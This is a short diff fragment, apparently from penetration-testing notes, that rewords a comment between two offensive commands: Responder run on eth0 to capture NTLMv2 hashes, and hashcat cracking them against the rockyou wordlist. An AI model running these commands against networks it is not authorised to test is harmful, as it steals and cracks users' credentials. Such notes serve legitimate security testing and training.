 responder -I eth0 -rdwv

-# Captures NTLMv2 hashes — crack with hashcat
+# Crack captured NTLMv2 hashes offline with hashcat

 hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt